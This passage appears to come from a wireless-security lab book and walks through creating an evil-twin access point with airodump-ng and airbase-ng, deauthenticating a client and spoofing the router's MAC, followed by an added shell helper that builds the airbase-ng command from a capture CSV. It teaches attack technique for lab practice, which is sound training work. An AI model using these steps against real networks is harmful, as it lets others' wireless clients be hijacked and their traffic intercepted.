Follow these instructions to get started:

1. Use airodump-ng to locate the access point's BSSID, channel and ESSID, which we would like to emulate in the evil twin. In this exercise the target is the ESSID "Wireless Lab" on channel 11.

2. Create the evil twin with the airbase-ng command, giving it the same ESSID as the target. Minor errors may occur with newer releases.

3. This new access point also shows up in the airodump-ng screen. It is important to note that you will need to run airodump-ng in a new window, locked to the target's channel, with the following command:

airodump-ng --channel 11 wlan0

Let's see this new access point: it is listed alongside the authorized one, with the same ESSID but a different BSSID, so at this stage the two are still distinguishable.

4. Send a deauthentication to the legitimate client so that it drops its connection and re-associates; as described below, it comes back to our evil twin instead of the authorized access point.

5. We can also spoof the BSSID, that is, the access point's MAC address, with the -a option:

airbase-ng -a <router mac> --essid "Wireless Lab" -c 11 mon0

6. Now, if we look at airodump-ng, it is almost impossible to differentiate between the two visually: airodump-ng keys its access point list by BSSID, so it is unable to discern that there are actually two different physical access points on the same channel. This is the most potent form of the evil twin.

The monitor interface name depends on your setup: older aircrack-ng releases create mon0 with airmon-ng, newer ones rename the card to wlan0mon, so substitute whichever monitor-mode interface airmon-ng reported on your system in the commands above.

We created an evil twin for the authorized network and used a deauthentication attack to have the legitimate client connect back to us, instead of the authorized network access point.
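As an added example (not the book's code), the following POSIX shell helper reads the CSV that airodump-ng writes when run with -w, looks up the target's BSSID and channel, and prints the airbase-ng line for the evil twin. It also counts how many BSSIDs advertise a given ESSID, which is why an evil twin started without -a is visible as a second entry while one started with -a <router mac> collapses into the real access point's row. The function names and the sample CSV rows are constructed for this example; nothing in it transmits.

```shell
#!/bin/sh
# Added helper, not from the book. It reads the access-point section of the
# CSV that `airodump-ng -w <prefix> ...` writes (<prefix>-01.csv), looks up
# the target ESSID and prints the airbase-ng line to run. Function names and
# the sample data are this example's own.

# Constructed excerpt of an airodump-ng CSV (column layout as airodump-ng
# writes it; MAC addresses and times are made up). It holds the real
# "Wireless Lab" AP plus an un-spoofed evil twin on the same channel, which
# is why two BSSIDs advertise that ESSID. Real files use CRLF line endings;
# the columns read here are unaffected by the trailing CR.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, OPN, , , -40, 120, 0, 0. 0. 0. 0, 12, Wireless Lab,
AA:BB:CC:DD:EE:FF, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, OPN, , , -25, 60, 0, 0. 0. 0. 0, 12, Wireless Lab,
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -70, 80, 0, 0. 0. 0. 0, 5, Other,'

# ap_lookup ESSID CSV_TEXT -> "BSSID CHANNEL" of the first AP row carrying
# that ESSID (fields are separated by ", "; the ESSID is column 14).
ap_lookup() {
  printf '%s\n' "$2" | awk -F', *' -v e="$1" '
    NR > 1 && $1 ~ /^..:..:..:..:..:..$/ && $14 == e { print $1, $4; exit }'
}

# bssid_count ESSID CSV_TEXT -> number of distinct BSSIDs advertising ESSID.
# airodump-ng keys its AP table by BSSID, so a twin with the router's MAC
# spoofed via -a does not add a row and this count stays at 1.
bssid_count() {
  printf '%s\n' "$2" | awk -F', *' -v e="$1" '
    NR > 1 && $1 ~ /^..:..:..:..:..:..$/ && $14 == e && !seen[$1]++ { n++ }
    END { print n + 0 }'
}

# twin_cmd MON_IF ESSID CHANNEL [BSSID] -> the airbase-ng command line.
# With BSSID given it is the MAC-spoofing form from the text; without it,
# airbase-ng uses the monitor interface's own MAC as the BSSID.
twin_cmd() {
  if [ -n "$4" ]; then
    printf 'airbase-ng -a %s --essid "%s" -c %s %s\n' "$4" "$2" "$3" "$1"
  else
    printf 'airbase-ng --essid "%s" -c %s %s\n' "$2" "$3" "$1"
  fi
}

# Usage: resolve the target from the capture, then build the spoofed twin.
target=$(ap_lookup "Wireless Lab" "$SAMPLE_CSV")
set -- $target            # $1 = BSSID, $2 = channel
twin_cmd mon0 "Wireless Lab" "$2" "$1"
echo "BSSIDs advertising 'Wireless Lab': $(bssid_count 'Wireless Lab' "$SAMPLE_CSV")"
```

Run it against a real capture by replacing SAMPLE_CSV with `$(cat capture-01.csv)`; the printed airbase-ng line is the one to type into the monitor-mode window, and a bssid_count of 2 for your own ESSID is exactly the tell that the un-spoofed twin leaves behind.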
It is important to note that, if the authorized access point uses encryption such as WEP/WPA, it is harder to turn this attack into traffic eavesdropping: the client only completes association with a twin that presents matching security settings, and for WPA/WPA2 that means knowing the pre-shared key to finish the four-way handshake. We will take a look at how to break the WEP key with just a client using the Caffe Latte attack in a later chapter.
Repeat the previous exercise with the evil twin on different channels and observe how the client, once disconnected, hops channels to find an access point to connect to. What is the deciding factor on which the client bases its choice of access point? Is it signal strength? Experiment and validate.